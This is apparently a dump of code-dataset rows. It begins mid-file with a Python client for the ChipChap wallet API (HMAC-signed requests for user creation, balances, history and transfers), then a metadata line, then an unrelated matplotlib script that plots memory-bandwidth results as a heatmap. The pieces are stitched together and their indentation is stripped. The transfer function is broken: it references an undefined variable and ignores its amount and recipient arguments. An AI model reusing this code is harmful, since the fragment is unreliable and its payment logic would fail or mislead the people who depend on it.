# print("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
# self.logger.error("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
#else:
# self.url_tx_json = cdata['url_tx_json']
self.url_fair_tx = cdata['url_fair_tx']
else:
self.able_to_connect = False
self.logger.critical("Invalid configuration data to connect.")
@classmethod
def get(cls):
return cls()
@classmethod
def init_logger(cls):
logger = logging.getLogger("multicurrency")
logger.setLevel(logging.WARNING)
if 'log_file' in settings.MULTICURRENCY:
fhpath = settings.MULTICURRENCY["log_file"]
else:
fhpath = "/".join(
[settings.PROJECT_ROOT, "multicurrency.log", ])
fh = logging.handlers.TimedRotatingFileHandler(
fhpath, when="d", interval=1, backupCount=7)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
@classmethod
def chipchap_x_signature(cls, access_key, access_secret):
if len(access_secret) % 4:
access_secret += '=' * (4 - len(access_secret) % 4)
nonce = str(randint(0, 100000000))
timestamp = str(int(time.time()))
string_to_sign = access_key + nonce + timestamp
signature = hmac.new(
b64decode(access_secret),
bytes(str(string_to_sign).encode("utf-8")),
hashlib.sha256).hexdigest()
headers = {
'X-Signature': 'Signature access-key="' + access_key +
'", nonce="' + nonce + '", timestamp="' + timestamp +
'", version="2", signature="' + signature + '"'}
return headers
def new_chipchap_user(self, username, email, company_name, password,
repassword):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'username': username,
'email': email,
'company_name': company_name,
'password': password,
'repassword': repassword,
}
response = requests.post(self.url_new_user, headers=headers, data=data)
if int(response.status_code) == 201:
self.logger.info("New chipchap user request for " + username
+ " has been succesfully processed.")
return response.json()
else:
msg = response.json()
self.logger.critical(
"New chipchap user request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code)
+ ': ' + msg['message'], response.text)
def new_client(self, username, password):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'username': username,
'password': password,
}
response = requests.post(self.url_client, headers=headers, data=data)
if int(response.status_code) == 200:
return response.json()
else:
self.logger.critical(
"Authentication request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code), response.text)
def wallet_history(self, access_key, access_secret, limit=10, offset=0):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
params = {
"limit": limit,
"offset": offset,
}
tx_list = requests.get(
self.url_history, headers=headers, params=params)
balance = requests.get(self.url_balance, headers=headers)
if int(tx_list.status_code) == 200 and int(balance.status_code) == 200:
return tx_list.json(), balance.json()
else:
error = str(balance.status_code) + ' and ' + str(
tx_list.status_code)
msg = balance.text + ' and ' + tx_list.text
self.logger.critical("Balance and history requests have returned "
+ error + " status codes. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def wallet_balance(self, access_key, access_secret):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
balance = requests.get(self.url_balance, headers=headers)
if int(balance.status_code) == 200:
return balance.json()
else:
error = str(balance.status_code)
msg = balance.text
self.logger.critical("Balance request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def send_w2w(self, access_key, access_secret, unit, amount, username, scale):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
payment = requests.get(self.url_w2w+(unit), headers=headers, params=params)
if int(payment.status_code) == 200:
return payment.json()
else:
error = str(payment.status_code)
msg = payment.text
self.logger.critical("Payment w2w request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def check_payment(self, access_key, access_secret, unit, txid):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
mtx = None
txlist, balance = self.wallet_history(access_key, access_secret, 20)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 20, search olders??")
self.logger.info("Can't find the mtxid in last 20, search olders??")
if not mtx:
txlist, balance = self.wallet_history(access_key, access_secret, 200)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 200, search olders??")
self.logger.info("Can't find the mtxid in last 200, search olders??")
return mtx, status
"""
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
if unit == 'fair':
unit = 'fac'
url = self.url_multi_txs # self.url_fair_tx+txid
else:
url = self.url_tx_json+(unit)+'/'+txid
params = {
'currency': unit,
'id': txid,
}
paycheck = requests.get(
url,
headers=headers)
#params=params)
print("URL: "+str(url))
#print("Headers: "+str(headers))
if int(paycheck.status_code) == 200:
self.logger.debug('Response (200) json:'+str(paycheck.json()))
print('Response (200) json:'+str(paycheck.json()))
return None, paycheck.json() # TODO
else:
error = str(paycheck.status_code)
#msg = paycheck.json()['message'] #json.loads(paycheck.text)
msg = paycheck.text
self.logger.error("Payment check request have returned "+error+" status code. Error: "+msg)
print("Payment check request have returned "+error+" status code. Error: "+msg)
return None, msg
#raise ChipChapAuthError('Error '+error, msg['message'])
"""
| agpl-3.0 | -2,161,126,652,751,138,000 | 41.785455 | 166 | 0.561023 | false | 4.064249 | false | false | false |
UK-MAC/mega-stream | scripts/heatmap.py | 1 | 2288 | #
#
# Copyright 2016 Tom Deakin, University of Bristol
#
# This file is part of mega-stream.
#
# mega-stream is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mega-stream is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mega-stream. If not, see <http://www.gnu.org/licenses/>.
#
#
# This aims to investigate the limiting factor for a simple kernel, in particular
# where bandwidth limits not to be reached, and latency becomes a dominating factor.
#
#
import numpy
import matplotlib.pyplot as plt
data = numpy.zeros((8,5))
data[0] = [71103.0, 114238.5, 94292.4, 92105.7, 52930.6]
data[1] = [147649.4, 223801.5, 251318.1, 227114.9, 196121.0]
data[2] = [252762.3, 311192.7, 294210.3, 227833.1, 185339.1]
data[3] = [310676.5, 395393.0, 302705.0, 195018.7, 0.0]
data[4] = [351479.6, 332399.7, 241249.2, 183720.3, 0.0]
data[5] = [439309.4, 294268.8, 191220.3, 168287.6, 0.0]
data[6] = [411714.6, 212903.5, 167718.5, 0.0, 0.0]
data[7] = [270262.7, 181380.7, 145228.9, 0.0, 0.0]
data *= 1.0E-3
fig, ax = plt.subplots()
plt.pcolor(data, cmap='GnBu')
ax.set_xticks(numpy.arange(data.shape[1]) + 0.5)
ax.set_yticks(numpy.arange(data.shape[0]) + 0.5)
ax.set_xticklabels([4, 8, 16, 32, 64])
ax.set_yticklabels([8, 16, 32, 64, 128, 256, 512, 1024])
ax.set_xlabel('Middle size')
ax.set_ylabel('Inner size')
plt.title('Outer size=64')
cbr = plt.colorbar()
cbr.ax.set_ylabel('Bandwidth GB/s')
# Add data labels
for i in range(data.shape[1]):
for j in range(data.shape[0]):
if (data[j][i] != 0.0):
plt.text(i + 0.5, j + 0.5, '%.1f' % (data[j][i]),
ha='center', va='center',
size='small', color='black', weight='bold')
else:
plt.text(i + 0.5, j + 0.5, '-',
ha='center', va='center',
size='small', color='black', weight='bold')
#fig.set_tight_layout(True)
plt.savefig('heatmap.pdf')
| gpl-3.0 | 1,387,855,735,382,224,000 | 33.149254 | 85 | 0.666958 | false | 2.591166 | false | false | false |